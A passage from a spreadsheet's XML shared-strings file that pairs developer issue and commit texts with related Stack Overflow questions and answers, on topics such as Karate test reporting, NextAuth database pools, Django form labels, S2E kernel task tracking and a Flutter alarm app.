writeln(course.accept(new ExcellentStudent()));   // YES!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;recently i try to integrate karate with chaintest report but seem like it doesn't work.
The chaintest report doesn't generate any test result
&lt;a href="https://i.sstatic.net/0XmgzmCY.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/0XmgzmCY.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Any advice for me. I can share my public repo, can you take a look. Thanks!
Here is test suite
&lt;a href="https://i.sstatic.net/Cb34WLGr.png" rel="nofollow noreferrer"&gt;https://i.sstatic.net/Cb34WLGr.png&lt;/a&gt;
And this is POM.xml&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;properties&amp;gt;
    &amp;lt;maven.compiler.source&amp;gt;17&amp;lt;/maven.compiler.source&amp;gt;
    &amp;lt;maven.compiler.target&amp;gt;17&amp;lt;/maven.compiler.target&amp;gt;
    &amp;lt;karate.version&amp;gt;1.4.1&amp;lt;/karate.version&amp;gt;
    &amp;lt;junit-jupiter.version&amp;gt;5.10.5&amp;lt;/junit-jupiter.version&amp;gt;
    &amp;lt;project.build.sourceEncoding&amp;gt;UTF-8&amp;lt;/project.build.sourceEncoding&amp;gt;
&amp;lt;/properties&amp;gt;
 &amp;lt;dependencies&amp;gt;
&amp;lt;dependency&amp;gt;
        &amp;lt;groupId&amp;gt;com.intuit.karate&amp;lt;/groupId&amp;gt;
        &amp;lt;artifactId&amp;gt;karate-core&amp;lt;/artifactId&amp;gt;
        &amp;lt;version&amp;gt;${karate.version}&amp;lt;/version&amp;gt;
        &amp;lt;scope&amp;gt;test&amp;lt;/scope&amp;gt;
    &amp;lt;/dependency&amp;gt;
    &amp;lt;dependency&amp;gt;
        &amp;lt;groupId&amp;gt;com.intuit.karate&amp;lt;/groupId&amp;gt;
        &amp;lt;artifactId&amp;gt;karate-junit5&amp;lt;/artifactId&amp;gt;
        &amp;lt;version&amp;gt;${karate.version}&amp;lt;/version&amp;gt;
        &amp;lt;scope&amp;gt;test&amp;lt;/scope&amp;gt;
    &amp;lt;/dependency&amp;gt;
    &amp;lt;dependency&amp;gt;
        &amp;lt;groupId&amp;gt;org.projectlombok&amp;lt;/groupId&amp;gt;
        &amp;lt;artifactId&amp;gt;lombok&amp;lt;/artifactId&amp;gt;
        &amp;lt;version&amp;gt;1.18.30&amp;lt;/version&amp;gt;
        &amp;lt;scope&amp;gt;test&amp;lt;/scope&amp;gt;
    &amp;lt;/dependency&amp;gt;
&amp;lt;dependency&amp;gt;
        &amp;lt;groupId&amp;gt;com.aventstack&amp;lt;/groupId&amp;gt;
        &amp;lt;artifactId&amp;gt;chaintest-junit5&amp;lt;/artifactId&amp;gt;
        &amp;lt;version&amp;gt;1.0.11&amp;lt;/version&amp;gt;
    &amp;lt;/dependency&amp;gt;
    &amp;lt;dependency&amp;gt;
        &amp;lt;groupId&amp;gt;org.freemarker&amp;lt;/groupId&amp;gt;
        &amp;lt;artifactId&amp;gt;freemarker&amp;lt;/artifactId&amp;gt;
        &amp;lt;version&amp;gt;2.3.33&amp;lt;/version&amp;gt;
    &amp;lt;/dependency&amp;gt;
    &amp;lt;dependency&amp;gt;
        &amp;lt;groupId&amp;gt;org.junit.jupiter&amp;lt;/groupId&amp;gt;
        &amp;lt;artifactId&amp;gt;junit-jupiter-engine&amp;lt;/artifactId&amp;gt;
        &amp;lt;version&amp;gt;${junit-jupiter.version}&amp;lt;/version&amp;gt;
    &amp;lt;/dependency&amp;gt;
    &amp;lt;dependency&amp;gt;
        &amp;lt;groupId&amp;gt;org.junit.platform&amp;lt;/groupId&amp;gt;
        &amp;lt;artifactId&amp;gt;junit-platform-launcher&amp;lt;/artifactId&amp;gt;
        &amp;lt;version&amp;gt;1.10.5&amp;lt;/version&amp;gt;
    &amp;lt;/dependency&amp;gt;
    &amp;lt;dependency&amp;gt;
        &amp;lt;groupId&amp;gt;org.junit.jupiter&amp;lt;/groupId&amp;gt;
        &amp;lt;artifactId&amp;gt;junit-jupiter-api&amp;lt;/artifactId&amp;gt;
        &amp;lt;version&amp;gt;${junit-jupiter.version}&amp;lt;/version&amp;gt;
    &amp;lt;/dependency&amp;gt;
&amp;lt;dependencies&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C224</t>
  </si>
  <si>
    <t>See also http://stackoverflow.com/questions/21101748/explicit-state-parameter-in-jerseys-oauth2codegrantflow/
There would be nice to have a more straight forward way to set the state parameter.
My use case: I've got a client app and a backend. I try to keep the app as minimalistic as possible and to handle as much logic on the backend as I can. So my app tries to access a resource on the backend API, which ultimately gets the resource from somewhere else. When running the flow for the first time there is no authorization code/access token so the backend redirects the app to an authorization entry point. Then the app gets the access token and uploads it in the backend. And here I need to have a state, to be able to map this token to the original query.</t>
  </si>
  <si>
    <t>You can use OAuth2CodeGrantFlow.Builder#property(...) method to set the state parameter:
final OAuth2CodeGrantFlow codeGrantFlow = OAuth2ClientSupport
        .googleFlowBuilder(clientIdentifier, redirectURI, scope)
        .prompt(OAuth2FlowGoogleBuilder.Prompt.CONSENT)
        .property(OAuth2CodeGrantFlow.Phase.AUTHORIZATION, OAuth2Parameters.STATE, state)
        .build();
I agree, it's not very convenient. If you have a legitimate use-case to modify builder/flow, feel free to file an improvement to our JIRA.</t>
  </si>
  <si>
    <t xml:space="preserve">I am working on a web application (ASP.NET) game that would consist of a single page, and on that page, there would be a game board akin to Monopoly.  I am trying to determine what the best architectural approach would be.  The main requirements I have identified thus far are:
Up to six users share a single game state object.
The users need to keep (relatively) up to date on the current state of the game, i.e. whose turn it is, what did the active user just roll, how much money does each other user have, etc.
I have thought about keeping the game state in a database, but it seems like overkill to keep updating the database when a game state object (say, in a cache) could be kept up to date.  For example, the flow might go like this:
Receive request for data from a user.
Look up data in database.  Create object from that data.
Verify user has permissions to perform request based on the game's state (i.e. make sure it's really their turn or have enough money to buy that property).
Update the game object.
Write the game object back to the database.
Repeat for every single request.
Consider that a single server would be serving several concurrent games.
I have thought about using AJAX to make requests to an an ASP.NET page.
I have thought about using AJAX requests to a web service using silverlight.
I have thought about using WCF duplex channels in silverlight.
I can't figure out what the best approach is.  All seem to have their drawbacks.  Does anyone out there have experience with this sort of thing and care to share those experiences?  Feel free to ask your own questions if I am being too ambiguous!  Thanks.
Update:  Does anyone have any suggestions for how to implement this connection to the server based on the three options I mention above?
</t>
  </si>
  <si>
    <t>C225</t>
  </si>
  <si>
    <t>DarkUI (WinForms) to Avalonia (WPF) conversion
TIDE is currently being rewritten in Avalonia, I suggest TE, WT &amp; ST to follow along.
Main advantages of Avalonia WPF:
Super responsive
Cross-platform
Modern (uses a Fluent Design language, but can also use a more DarkUI-like one, which still looks 100x better)
FAST
Easy to use
There's mostly no need to write new controls, since WPF is already super customizable. You can natively have Buttons, TextBoxes, CheckBoxes and Images in TreeViews &amp; DataGridViews without any extra code.
Sadly, such a rewrite would take a while, but it's the first step in making TE cross-platform.
We can have 2 approaches while rewriting:
Use existing C# code and alter it to work with WPF (very crippled, not recommended, but it would save a lot of time)
Example code:
&lt;TextBox x:Name="tb_Output" IsReadOnly="True" /&gt;
&lt;Button Click="Button_Click" /&gt;
public void Button_Click(object sender, RoutedEventArgs e)
{
    tb_Output.Text = "ABC";
}
Rewrite the entire thing with MVVM in mind, therefore getting rid of the horrible Editor class
Example code:
&lt;TextBox Text="{Binding Output}" IsReadOnly="True" /&gt;
&lt;Button Command="ChangeOutput" /&gt;
public string Output { get; set; }
private void ChangeOutput_Executed(object sender, ExecutedRoutedEventArgs e)
{
    Output = "ABC";
}
TIDE is currently using the second approach, we will see how it goes.
I recommend reading this article:
https://stackoverflow.com/a/15684569
and also taking a look at the fantastic documentation Avalonia provides, since it allows you to quickly understand and start working with WPF:
http://avaloniaui.net/docs
We also need at least 5 people interested in collaborating / helping to rewrite TE. One person taking such responsibility is overki</t>
  </si>
  <si>
    <t>I like to blog about beginner articles for WPF, and there are a few in particular that may help you out:
Understanding the change in mindset when switching from WinForms to WPF
What is this "DataContext" you speak of?
A Simple MVVM Example
To summarize, the biggest difference between Winforms and WPF is that in WPF your data layer (the
DataContext
) is your application, while in Winforms your UI layer is your application.
To look at it another way, with WPF your application consists of the objects you create, and you use Templates and other UI objects to tell WPF how to draw your application components.
That's the opposite of WinForms where you build your application out of UI objects, and then supply them with the data needed.
Because of this, the designer isn't actually used that much since your application components are designed in code, and the designer is only needed to draw a user-friendly interface that reflects your data classes (typically
Models
and
ViewModels
)
And personally, I prefer to type all my XAML out by hand since it's faster and doesn't make as much of a mess as the drag/drop WPF designer does, although I do use the Designer on occasion to preview what my UI will look like.
So to your answer your question about if there's other WPF designers suited for WinForms developers, I would suggest that instead of looking for another designer, instead look to learn how to use WPF in the way it's meant to be used. Using WPF like it's WinForms means you miss out on much of what makes it so great :)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The problem: I keep getting error messages saying that my neonserverless pool connection has unexpectedly terminated.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;uncaughtException: Error: Connection terminated unexpectedly
at fn.eval (webpack-internal:///(middleware)/./node_modules/.pnpm/@neondatabase+serverless@0&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Where I suspect the problem lies: not creating the connection object in the right way / place&lt;/p&gt;
&lt;p&gt;The various confounding issues: as I'm using nodemailer, which is incompatible with the Edge runtime used by Next middleware, I've distributed various parts of the auth configuration between auth.ts, middleware.ts and authConfig.ts. Middleware defaults to jwt unless I explicitly state that I need to use the session strategy (I'm using magic email login), but then that also requires that I explicitly state in middleware what adapter I'm using, which then also means I need to refer to the pool const. I tried setting up a pool const in a separate databaseConfig.ts file, but still got the connection termination issues. So what's working, but what I assume is not the right approach, is to create pool connection objects in both auth.ts and middleware.ts. Users can log in and out okay, the cookies work, the database is getting accessed accordingly, but I keep getting the messages saying: &amp;quot;connection terminated unexpectedly&amp;quot;.&lt;/p&gt;
&lt;p&gt;I remember reading that the pool connection should not be created outside of any of the relevant functions (see &lt;a href="https://authjs.dev/getting-started/adapters/pg?framework=next-js" rel="nofollow noreferrer"&gt;here&lt;/a&gt; and comment in auth.ts code), so I've set them up as shown. But since I'm still getting the error and since repetition of code = bad, I can't help thinking there must be another way to dot all the i's without making two separate pool connection objects.&lt;/p&gt;
&lt;p&gt;auth.ts file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import { Pool } from &amp;quot;@neondatabase/serverless&amp;quot;
//Nextauth docs say *don't* declare pool variable here
export const {handlers, signIn, signOut, auth} = NextAuth(() =&amp;gt; {  
//declare pool variable here inside function
const pool = new Pool({ 
  host: process.env.BLAH,
  user: process.env.BLAH,
  password: process.env.BLAH,
  database: process.env.BLAH,
  max: 20,
  idleTimeoutMillis: 30000,
  connectionString: process.env.BLAH, 
  connectionTimeoutMillis: 2000,
})
return {...authConfig,
  adapter: PostgresAdapter(pool),      
  callbacks: {
    session({ session, user }) {            
        return session
    }
  },
  providers: [  
    Nodemailer({  
        server: {  
            host: process.env.BLAH,  
            port: Number(process.env.BLAH),  
            auth: {  
                user: process.env.BLAH,  
                pass: process.env.BLAH,  
            },  
        },  
        from: process.env.EMAIL_FROM,  
    }),  
]}
// other options...
})
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;authConfig.ts&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;export default {
providers: [],
session: { strategy: &amp;quot;database&amp;quot; },
// other options...
} satisfies NextAuthConfig
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;middleware.ts&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;export const {auth: middleware} = NextAuth(() =&amp;gt; {  
const pool = new Pool({ 
  host: process.env.BLAH,
  user: process.env.BLAH,
  password: process.env.BLAH,
  database: process.env.BLAH,
  max: 20,
  idleTimeoutMillis: 30000,
  connectionString: process.env.BLAH, 
  connectionTimeoutMillis: 2000,
})
return {...authConfig,
    adapter: PostgresAdapter(pool),
    callbacks: {
        session({ session, user }) {                
            return session
        }
      },
}
})
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So that's where I am with it. Be grateful for any insights, thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C226</t>
  </si>
  <si>
    <t>Subclass PasswordResetForm and update password reset template
Similar to the LoginForm, subclass it so that we can get rid
of the colons in the form label as well as change the label itself.
Source:
- https://github.com/django/django/blob/9a54a9172a724d38caf6a150f41f23d79b9bdbb7/django/contrib/auth/forms.py#L251
- https://stackoverflow.com/a/637020</t>
  </si>
  <si>
    <t>You should use:
def __init__(self, *args, **kwargs):
    super(RegistrationFormTOS, self).__init__(*args, **kwargs)
    self.fields['email'].label = "New Email Label"
Note first you should use the super call.</t>
  </si>
  <si>
    <t xml:space="preserve">What are the pro/cons of doing web development on your local machine rather than on a centralized development server? For those that do dev on your local machine, how do you keep an updated db architecture for local development when multiple developers are involved?
In particular, I'm currently experimenting with XAMPP for PHP and was curious how I keep the MySQL DB instance on my local machine in sync when other developers are regularly changing data/db structure.
Is local development only practical when working alone? 
</t>
  </si>
  <si>
    <t>C227</t>
  </si>
  <si>
    <t>It is often that we want to implement a login redirect back to original link, rather than home page. For example, if I visit /secure/place/a and get redirected to /login, after I submitted my username and password I should go back to the original URL instead of /.
I tried to implement this behavior using Referer header as:
@UrlContext("login")
@NoAuthentication
public class LoginController {
    private static final String KEY_REFRER = "referer";
    @GetAction
    @TemplateContext("/")
    public void loginForm(@HeaderVariable String referer, H.Session session) {
        if (S.notBlank(referer)) {
            session.put(KEY_REFRER, referer);
        }
    }
    @PostAction
    public void login(
            @NotBlank String email,
            String password,
            @SessionVariable(KEY_REFRER) @DefaultValue("/secure/place") String referer,
            User.Dao userDao,
            ActionContext context
    ) {
        User user = userDao.authenticate(email, password);
        if (null == user) {
            context.flash().error("Unknown email/password combination");
            redirect("");
        }
        context.login(email);
        context.session().remove(KEY_REFRER);
        redirect(referer);
    }
Unfortunately the above code doesn't work as expected because browser doesn't prepare the Referer header on the initial 302 redirect when redirecting to the same domain. See more about this on https://stackoverflow.com/questions/2158283/will-a-302-redirect-maintain-the-referer-string.</t>
  </si>
  <si>
    <t>Short answer is it's not specified in the relevant RFC 2616
http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.36
either for the Referer header or the 302 status code.
Your best bet is to do a test with several browsers and see if there's a consensus behaviour.
For full belt and braces, encode the original referrer in the redirect URL so you can guarantee to retrieve it.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My class connects to an external site and stores the result in the $connectArray variable. A timeout value is returned so I added the CheckTime function to check that. But $connectArray is empty on reload of the class. Would someone please explain why that variable is not staying set?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    class myclass {
       public $connectArray;
       public $sessionTime;
       public function __construct() {
          $this-&amp;gt;GetAccessToken();  
       }
       public function CheckTime() {
           if (! empty($this-&amp;gt;connectArray-&amp;gt;accessToken)) {
               echo 'cmp '.$this-&amp;gt;sessionTime . ' - ' . time() + $this-&amp;gt;connectArray-&amp;gt;expiresIn. '&amp;lt;br&amp;gt;';
               return true;
           }
           echo 'missing details&amp;lt;br&amp;gt;';
           return false;     
       }
       public function GetAccessToken() {
           $this-&amp;gt;CheckTime();
           $url = &amp;quot;https://example.com&amp;quot;;
           $headers = ['userName' =&amp;gt; &amp;quot;xxxx&amp;quot;,
                       'password' =&amp;gt; &amp;quot;xxxx&amp;quot;               
                      ];  
           $ch = curl_init();
           curl_setopt ($ch, CURLOPT_URL, $url);
           curl_setopt ($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
           curl_setopt ($ch, CURLOPT_POSTFIELDS, json_encode($headers));
           curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));        
           curl_setopt ($ch, CURLOPT_SSLVERSION, 6);
           curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 2);  
           curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, true);                                
           curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
           curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);      
           $result = curl_exec($ch);
           if (curl_error($ch)) {
               echo 'Curl error: ' . curl_error($ch);
               flush();
               ob_flush();                      
           }
           curl_close($ch);
           $this-&amp;gt;connectArray = json_decode($result);
           if (! empty($this-&amp;gt;connectArray-&amp;gt;errorCode)) {
               $this-&amp;gt;sessionTime = '';
               return false;
           } elseif (! empty($this-&amp;gt;connectArray-&amp;gt;accessToken)) {
               $this-&amp;gt;sessionTime = time() + $this-&amp;gt;connectArray-&amp;gt;expiresIn;
               return true;
           }
           return false;        
       }    
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C228</t>
  </si>
  <si>
    <t>As far as I know, the problem comes from the fact that the request is started, and directly closed by the unload event.
Describe the bug
Prestashop module named statsdata uses an unload event to send a POST request with data about user activity. This does not work for me since I get a 99% of 499s because web browser cannot handle the request fully.
A shop is hosted on dedicated machine with good hardware and network, it depends more on a client network speed, but the unload event may not be reliable for this purpose simply because we have multiple web browsers.
Expected behavior
I expect to receive a HTTP 200 response code, not a 499
Steps to Reproduce
Edit by Khouloud
Go to BO &gt; Module manager page &gt; search for the statsdata module and configure it.
Enable Save page views for each customer, Save global page views options and save
Go to FO &gt; Inspect the element &gt; in the Network tab &gt; Select the "Preserve log" option and reload the page
see an error
The ajax request shouldn't be in async mode during the unload event. That's the reason why it's not working as expected.
Here is an example of how it should be handled:
https://stackoverflow.com/a/19275264</t>
  </si>
  <si>
    <t>If you're using jQuery, you can set async to false in the ajax call.  And it might work, but your results may vary by browser.  Here's a jsFiddle example.
http://jsfiddle.net/jtaylor/wRkZr/4/
// Note:  I came across a couple articles saying we may should to use window.onbeforeunload instead of or in addition to jQuery's unload.  Keep an eye on this.
//        http://vidasp.net/jQuery-unload.html
//        https://stackoverflow.com/questions/1802930/setting-onbeforeunload-on-body-element-in-chrome-and-ie-using-jquery
var doAjaxBeforeUnloadEnabled = true; // We hook into window.onbeforeunload and bind some jQuery events to confirmBeforeUnload.  This variable is used to prevent us from showing both messages during a single event.
var doAjaxBeforeUnload = function (evt) {
    if (!doAjaxBeforeUnloadEnabled) {
        return;
    }
    doAjaxBeforeUnloadEnabled = false;
    jQuery.ajax({
        url: "/",
        success: function (a) {
            console.debug("Ajax call finished");
        },
        async: false /* Not recommended.  This is the dangerous part.  Your mileage may vary. */
    });
}
$(document).ready(function () {
    window.onbeforeunload = doAjaxBeforeUnload;
    $(window).unload(doAjaxBeforeUnload);
});
In Google Chrome, the ajax call always completes before I navigate away from the page.
However, I would VERY MUCH NOT RECOMMEND going that route.  The "a" in ajax is for "asynchronous", and if you try to force to act like a synchronous call, you're asking for trouble.  That trouble usually manifests as freezing the browser -- which might happen if the ajax call took a long time.
If viable, consider prompting the user before navigating away from the page if the page has data that needs to be posted via ajax.  For an example, see this question:
jquery prompt to save data onbeforeunload</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to get my head around [external-link]. It looks great for inter-machine (cluster, LAN, WAN) communication between applications but I'm not sure if it is suitable (in architectural, and current implementation terms) for use as a software bus within one machine.
Would it be worth pulling out a current high performance message passing framework to replace it with AMQP, or is this falling into the [external-link] by blurring the distinction between local and non-local communication?
I'm also wary of the performance impacts of using a WAN technology for intra-machine communications, although this may be more of an implementation concern than architecture.
War stories would be appreciated.
</t>
  </si>
  <si>
    <t>C229</t>
  </si>
  <si>
    <t>linux: refactoring to correctly track the current_task
The LinuxMonitor plugin currently uses the approach described at
https://stackoverflow.com/questions/11961490/understanding-the-getting-of-task-struct-pointer-from-process-kernel-stack
to get the current task_struct and hence the PID of the process currently
running in the system. Unfortunately, this approach is only valid for kernel
versions &lt; 4.x In kernel versions &gt; 4.x the only way to get the current
task_struct is via the get_current function
(arch/$(ARCH)/include/asm/current.h). This required some major refactoring to
get this information to the LinuxMonitor plugin.
We introduced a new dynamic kernel module, s2e (similar to the Windows S2E
driver). When loaded the S2E module sends crucial information on kernel
addresses and data structures to the LinuxMonitor plugin, including the address
of the current task_struct pointer. With this information, the LinuxMonitor
plugin is able to correctly track the current PID in the kernel.
We can also send offset values to the LinuxMonitor plugin, which makes the
plugin architecture independent and more easily ported to kernels (previously
these offsets were hardcoded into the LinuxMonitor plugin itself).
This module has the added bonus that we can correctly check if the LinuxMonitor
plugin is enabled when we resume from a snapshot. Previously, the LinuxMonitor
plugin was checked only at kernel boot. However, when resuming from a snapshot
the LinuxMonitor plugin may be in a different state (i.e. enabled or disabled)
than that when the booted was originally booted.
Finally, we rearchitectured the S2E modifications so that they can be
completely disabled via a Kconfig option.</t>
  </si>
  <si>
    <t>The kernel stack contains a special struct at the top --
thread_info
:
26 struct thread_info {
 27         struct task_struct      *task;          /* main task structure */
 28         struct exec_domain      *exec_domain;   /* execution domain */
 29         __u32                   flags;          /* low level flags */
 30         __u32                   status;         /* thread synchronous flags */
 31         __u32                   cpu;            /* current CPU */
 32         int                     preempt_count;  /* 0 =&gt; preemptable,
 33                                                    &lt;0 =&gt; BUG */
 34         mm_segment_t            addr_limit;
 35         struct restart_block    restart_block;
 36         void __user             *sysenter_return;
 37 #ifdef CONFIG_X86_32
 38         unsigned long           previous_esp;   /* ESP of the previous stack in
 39                                                    case of nested (IRQ) stacks
 40                                                 */
 41         __u8                    supervisor_stack[0];
 42 #endif
 43         unsigned int            sig_on_uaccess_error:1;
 44         unsigned int            uaccess_err:1;  /* uaccess failed */
 45 };
So, to get the
task_struct
you'll need to get a
thread_info
pointer with
GET_THREAD_INFO
from the ASM-code:
183 /* how to get the thread information struct from ASM */
184 #define GET_THREAD_INFO(reg)     \
185         movl $-THREAD_SIZE, reg; \
186         andl %esp, reg
... or with
current_thread_info
from the C-code:
174 /* how to get the thread information struct from C */
175 static inline struct thread_info *current_thread_info(void)
176 {
177         return (struct thread_info *)
178                 (current_stack_pointer &amp; ~(THREAD_SIZE - 1));
179 }
Note that
THREAD_SIZE
defined as
(PAGE_SIZE &lt;&lt; THREAD_SIZE_ORDER)
and
THREAD_SIZE_ORDER
equals 1 for both x86_32 and x86_64 so
THREAD_SIZE
results to 8192 (2^13 or 1&lt;&lt;13).</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on an alarm app which is created in flutter. I am using android_alarm_manager_plus, flutter_foreground_task, flutter_local_notifications as the major packages to implement core functionality of alarm. I am basically building alarm app to trigger alarm for the selected days on specific time.&lt;/p&gt;
&lt;p&gt;The app is able to fire alarms by showing notification &amp;amp; play alarm-audio ,when the app is alive in foreground. But when i terminate my app, after setting alarm; it would show the notification. But no alarm-audio is played.&lt;/p&gt;
&lt;p&gt;here is my pubspec.yaml packages&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/0k2b3WbC.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/0k2b3WbC.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;When the alarm is being fired, the &amp;quot;alarmCallback&amp;quot; is executed. Inside it I have tried to start the foreground service that plays the audio in loop. Whenever the user taps on &amp;quot;stop alarm&amp;quot; notification button, i am stopping the audio and closing the foreground service.&lt;/p&gt;
&lt;p&gt;I tried to google about this problem, not much help exists there. So please help me to resolve this issue.
Here is the code of &amp;quot;alarmCallback&amp;quot;, &amp;quot;foregroundservice&amp;quot; and &amp;quot;foregroundServiceHandler&amp;quot;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;AlarmCallback&lt;/strong&gt; &amp;amp; &lt;strong&gt;foregroundStartServiceCallback&lt;/strong&gt; code (top level function)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
@pragma('vm:entry-point')
void startForegroundTaskCallback() {
  FlutterForegroundTask.setTaskHandler(ForegroundServiceHandler());
}
@pragma('vm:entry-point')
void alarmCallback(int id, Map&amp;lt;String, dynamic&amp;gt; params) async {
  debugPrint(&amp;quot;The alarm callback is running !&amp;quot;);
  bool isRunningService = await FlutterForegroundTask.isRunningService;
  debugPrint(&amp;quot;The foreground service is running : $isRunningService&amp;quot;);
  if (!isRunningService) {
    debugPrint(&amp;quot;Init foreground task&amp;quot;);
    ForegroundTaskService.init();
  } else {
    debugPrint(&amp;quot;restart foreground task&amp;quot;);
    await FlutterForegroundTask.restartService();
  }
  try {
    var map = params['params'] as Map&amp;lt;String, dynamic&amp;gt;;
    var alarmModel = Alarmsmodel.fromMap(map);
    debugPrint(alarmModel.toString());
    assert(alarmModel.audioPath != null,
        &amp;quot; Cannot play audio because ,audio path is null !&amp;quot;);
    ForegroundTaskService.saveData(&amp;quot;audioPath&amp;quot;, alarmModel.audioPath);
    ServiceRequestResult serviceResult =
        await ForegroundTaskService.startService();
    if (serviceResult is ServiceRequestSuccess) {
      debugPrint(&amp;quot;service result is success !&amp;quot;);
    } else if (serviceResult is ServiceRequestFailure) {
      debugPrint(&amp;quot;service result is faliure !&amp;quot;);
    }
    var weekDay = DateTime.now().weekday;
    // logic to reschedule alarm in repetition pattern.
    // await LocalAlarmService.rescheduleAlarm(alarmModel, weekDay);
  } catch (e) {
    debugPrint(&amp;quot;Error : $e&amp;quot;);
    throw Exception(&amp;quot;Something went wrong, after triggering alarmCallback&amp;quot;);
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is ForegroundService class that manages the foreground task in flutter&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
@pragma('vm:entry-point')
void startForegroundTaskCallback() {
  FlutterForegroundTask.setTaskHandler(ForegroundServiceHandler());
}
@pragma('vm:entry-point')
void alarmCallback(int id, Map&amp;lt;String, dynamic&amp;gt; params) async {
  debugPrint(&amp;quot;The alarm callback is running !&amp;quot;);
  bool isRunningService = await FlutterForegroundTask.isRunningService;
  debugPrint(&amp;quot;The foreground service is running : $isRunningService&amp;quot;);
  if (!isRunningService) {
    debugPrint(&amp;quot;Init foreground task&amp;quot;);
    ForegroundTaskService.init();
  } else {
    debugPrint(&amp;quot;restart foreground task&amp;quot;);
    await FlutterForegroundTask.restartService();
  }
  try {
    var map = params['params'] as Map&amp;lt;String, dynamic&amp;gt;;
    var alarmModel = Alarmsmodel.fromMap(map);
    debugPrint(alarmModel.toString());
    assert(alarmModel.audioPath != null,
        &amp;quot; Cannot play audio because ,audio path is null !&amp;quot;);
    ForegroundTaskService.saveData(&amp;quot;audioPath&amp;quot;, alarmModel.audioPath);
    ServiceRequestResult serviceResult =
        await ForegroundTaskService.startService();
    if (serviceResult is ServiceRequestSuccess) {
      debugPrint(&amp;quot;service result is success !&amp;quot;);
    } else if (serviceResult is ServiceRequestFailure) {
      debugPrint(&amp;quot;service result is faliure !&amp;quot;);
    }
    var weekDay = DateTime.now().weekday;
    // logic to reschedule alarm in repetition pattern.
    // await LocalAlarmService.rescheduleAlarm(alarmModel, weekDay);
  } catch (e) {
    debugPrint(&amp;quot;Error : $e&amp;quot;);
    throw Exception(&amp;quot;Something went wrong, after triggering alarmCallback&amp;quot;);
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is the code of &lt;strong&gt;foregroundServiceHandler&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
class ForegroundServiceHandler extends TaskHandler {
  @override
  Future&amp;lt;void&amp;gt; onStart(DateTime timestamp, TaskStarter starter) async {
    debugPrint(&amp;quot;Fetching audio path.&amp;quot;);
    String? audioPath =
        await FlutterForegroundTask.getData&amp;lt;String&amp;gt;(key: 'audioPath');
    debugPrint(&amp;quot;The audio path is $audioPath&amp;quot;);
    if (audioPath != null &amp;amp;&amp;amp; audioPath.isNotEmpty) {
      debugPrint(
          &amp;quot;The audio path is not null neither its empty . Audiopath is $audioPath&amp;quot;);
      AudioService.instance.playAudioInForeground(audioPath);
    } else {
      debugPrint(
          &amp;quot;Error : audioPath is missing. (ForegroundServiceHandler)(onStart)&amp;quot;);
    }
  }
  @override
  void onNotificationButtonPressed(String id) {
    super.onNotificationButtonPressed(id);
    debugPrint(&amp;quot;onNotificationButtonPressed&amp;quot;);
    if (id == &amp;quot;stop_audio&amp;quot;) {
      AudioService.instance.stopAudio();
    }
    FlutterForegroundTask.stopService();
  }
  @override
  void onNotificationPressed() {
    super.onNotificationPressed();
    debugPrint(&amp;quot;onNotificationPressed&amp;quot;);
  }
  @override
  void onNotificationDismissed() {
    super.onNotificationDismissed();
    debugPrint(&amp;quot;onNotificationDismissed&amp;quot;);
    FlutterForegroundTask.stopService();
  }
  @override
  void onReceiveData(Object data) {
    super.onReceiveData(data);
    debugPrint(&amp;quot;onReceiveData&amp;quot;);
  }
  @override
  void onRepeatEvent(DateTime timestamp) {}
  @override
  Future&amp;lt;void&amp;gt; onDestroy(DateTime timestamp) async {
    debugPrint(&amp;quot;onDestroy invoked. Stopping service&amp;quot;);
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is my code &lt;strong&gt;Audio Service&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
class AudioService {
  AudioPlayer? _audioPlayer;
  bool isAudioPlaying = false;
  static final AudioService instance = AudioService._internal();
  factory AudioService() {
    return instance;
  }
  AudioService._internal() {
    _audioPlayer = AudioPlayer();
    _audioPlayer?.setReleaseMode(ReleaseMode.loop);
    _audioPlayer?.onPlayerStateChanged.listen((PlayerState state) {
      isAudioPlaying = (state == PlayerState.playing);
    });
  }
  void disposeAudio() {
    _audioPlayer?.dispose();
    _audioPlayer = null;
  }
  void playAudio(String path) async {
    if (_audioPlayer == null) {
      debugPrint(&amp;quot;Audio player instance is null !&amp;quot;);
    } else {
